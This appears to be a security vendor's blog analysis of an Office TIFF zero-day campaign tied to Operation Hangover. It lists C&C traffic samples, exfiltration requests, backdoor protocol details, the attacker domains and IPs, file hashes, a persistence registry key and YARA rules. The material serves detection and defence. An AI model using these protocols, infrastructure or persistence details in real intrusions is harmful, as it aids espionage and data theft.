Earlier today Microsoft released a security advisory alerting about a new Microsoft Office vulnerability being exploited in the wild. The vulnerability affects Office 2003/2007 and Office 2010 only running on Windows XP/2003.
The vulnerability is related to the parsing of TIFF images and Microsoft released a FixIt that basically block the rendering of TIFF images on the system.
The exploit we have analyzed uses ROP gadgets and ActiveX controls to heap spray memory (instead of Flash).
If they exploit is successful it uses URLDownloadToFileA to download and execute a payload from a remote HTTP server:
The downloaded payload is a RAR file containing both a malicious payload and a lure Office document that is showed to the victim.
We have found different payloads talking to the the same C&C server that use different lure documents. Some of the lure documents are related to the Pakistan Intelligence service (Inter-Services Intelligence or ISI) and the Pakistani military.
This payload communicates with the C&C server using the HTTP protocol:
GET /logitech/rt.php?cn=XXXXX@Administrator&str=&file=no HTTP/1.1
User-Agent: WinInetGet/0.1
When we showed this traffic we realized it was familiar. In fact the same protocol was used by one of the Operation Hangover payloads. We can confirm that the downloader is based on the Deksila downloader not only because it generates similar HTTP traffic but also the way it retrieves information from the system and even the raw strings from both payloads:
The presence of the following files can be used to find infected systems by different versions of the downloader:
- C:Documents and Settings
Tempiconfall.log - C:Documents and Settings
HddLink.lnk - C:Documents and Settings
Updates.exe - C:Documents and Settings
wincert.exe - C:Documents and Settings
kayani.doc - C:Documents and Settings
Shanti.doc - C:Documents and Settings
Locations.doc - C:Documents and Settings
ISI.doc - C:Documents and Settings
GoodLuck.doc - C:cdata.txt
Based on the victim information we could retrieve from the C&C server we can confirm that most of IP addresses communicating with the C&C server are based on Pakistan.
When the infected system checkins on the C&C server a file is created with the following content:
User : [USERNAME]
IP : [IP_ADDRESS]
AV : [NAME_OF_ANTIVIRUS_SOLUTION]
The attackers are able to send other payloads to the infected systems (2nd stage) that are downloaded by the victims using HTTP requests. Based on the C&C information we collected this is the list of unique filenames that are being used to download 2nd stage payloads:
- alg.exe
- connhost.exe
- lgfxsrc.exe
- lgfxsrv.exe
- lgfxsrvc.exe
- msctcd.exe
- svchost.exe
- taskmgr.exe
- taskngr.exe
- waulct.exe
- wimhost.exe
- winlog.exe
- winlogon.exe
- winnit.exe
- winsoun.exe
- winword.exe
- wmpi.exe
- wsqmocn.exe
And the list of unique md5s:
- 0d51296e5c74a22339ec8b7e318f274a
- 101852851d70dfc46c4d022ef077d586
- 2ed6a6c349cae3842023d83c6b1ed1c5
- 4e878b13459f652a99168aad2dce7c9a
- 654f558cf824e98dde09b197dbdfd407
- 6a57cda67939806359a03a86fd0eabc2
- 8378abb63da7e678c76c09f44b43d02a
- e75ad6c8484f524d93eaf249770be699
- fd51dc5f1683c666a4925af8f1361d5d
- fd75a23d8b3345e550c4a9bbc6dd2a0e
From all the payloads we retrieved from the C&C the following were already uploaed to Virustotal. You can notice the low Antivirus detection rate:
- fd75a23d8b3345e550c4a9bbc6dd2a0e 1 / 47
- 6a57cda67939806359a03a86fd0eabc2 1 / 47
- 4e878b13459f652a99168aad2dce7c9a 1 / 47
- 2ed6a6c349cae3842023d83c6b1ed1c5 0 / 47
Following is a description of the different payloads we found in the C&C with the purpose to help you to build IOCs (Indicators Of Compromise) and detect infected systems.
Main Downloader
- Network traffic
Perform HTTP GET requests, some examples are:/logitech/rt.php?cn=xx@
&str=&file=no /green/srt.php?cn=xx@
&str=&file=no /funbox/rt.php?cn=
@ &str=&file=no /joy/rt.php?cn=
You can look for the pattern “&str=&file=no” in your proxy logs to find infected systems.@ &str=&file=no
- Yara rule:
rule Hangover2_Downloade {
strings:
$a = "WinInetGet/0.1" wide ascii
$b = "Excep while up" wide ascii
$c = "&file=" wide ascii
$d = "&str=" wide ascii
$e = "?cn=" wide ascii
condition:
all of them
}
File stealer
It looks for the following file types on the infected system and exfiltrates them to the C&C server:
- xls,xlsx
- doc,docx
- ppt,pptx
- txt
- Network traffic
Perform POST requests, some examples are:POST /crks.php HTTP/1.1 Content-Length: 44 Content-Type: application/x-www-form-urlencoded User-Agent: MyWebClient Host: xxx Connection: Keep-Alive
POST /drkl.php HTTP/1.1 Content-Length: 44 Content-Type: application/x-www-form-urlencoded User-Agent: MyWebClient Host: xxx Connection: Keep-Alive
POST /max.php HTTP/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded User-Agent: MyWebClient Host: xxx Connection: Keep-Alive
You can look for HTTP connections with the User-Agent MyWebClient -
Yara rule
rule Hangover2_stealer
{
strings:
$a = "MyWebClient" wide ascii
$b = "Location: {[0-9]+}" wide ascii
$c = "[%s]:[C-%s]:[A-%s]:[W-%s]:[S-%d]" wide ascii
condition:
all of them
}
Remote shell backdoor
- Network traffic
This payload is a remote shell backdoor that uses a binary protocol on port 5858. Example traffic:T VICTIM:1050 -> C&C:5858 [A]
FHEPF
#
T VICTIM:5858 -> C&C:1050 [AP]
Pass
#
T VICTIM:1050 -> C&C:5858 [AP]
Authjanettedoe @ [MACHINE_NAME]#/[OPERATING_SYSTEM]#/[IP_ADDRESS]#/ -
Yara rule
rule Hangover2_backdoor_shell
{
strings:
$a = "Shell started at: " wide ascii
$b = "Shell closed at: " wide ascii
$c = "Shell is already closed!" wide ascii
$d = "Shell is not Running!" wide ascii
condition:
all of them
}
You can also look for the creation of the following registry key:
HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v WinLstart
Keylogger
This payload installs global keyboard hooks to capture keystrokes.
- Yara rule
rule Hangover2_Keylogger
{
strings:
$a = "iconfall" wide ascii
$b = "/c ipconfig /all > "" wide ascii
$c = "Global{CHKAJESKRB9-35NA7-94Y436G37KGT}" wide ascii
condition:
all of them
}
Schneebly (Screenshot payload)
This payload performs screenshots and upload them to the C&C server.
- Network traffic
Example traffic:
The Yara rules can be downloaded from our github repository.
Finally this is the list of IP addresses and domain names that are being used by the attackers to host C&C servers and malicious payloads:
- krickmart.com
- 37.0.125.77
- 37.0.124.106
- maptonote.com
- myflatnet.com
- lampur.com
- appworldstores.com
- similerwork.net
- intertechsupport.net
- lampur.com
- twikstore.com
We will continue publishing more information about the Microsoft Office 0day and more IOC's as soon as we discover new data.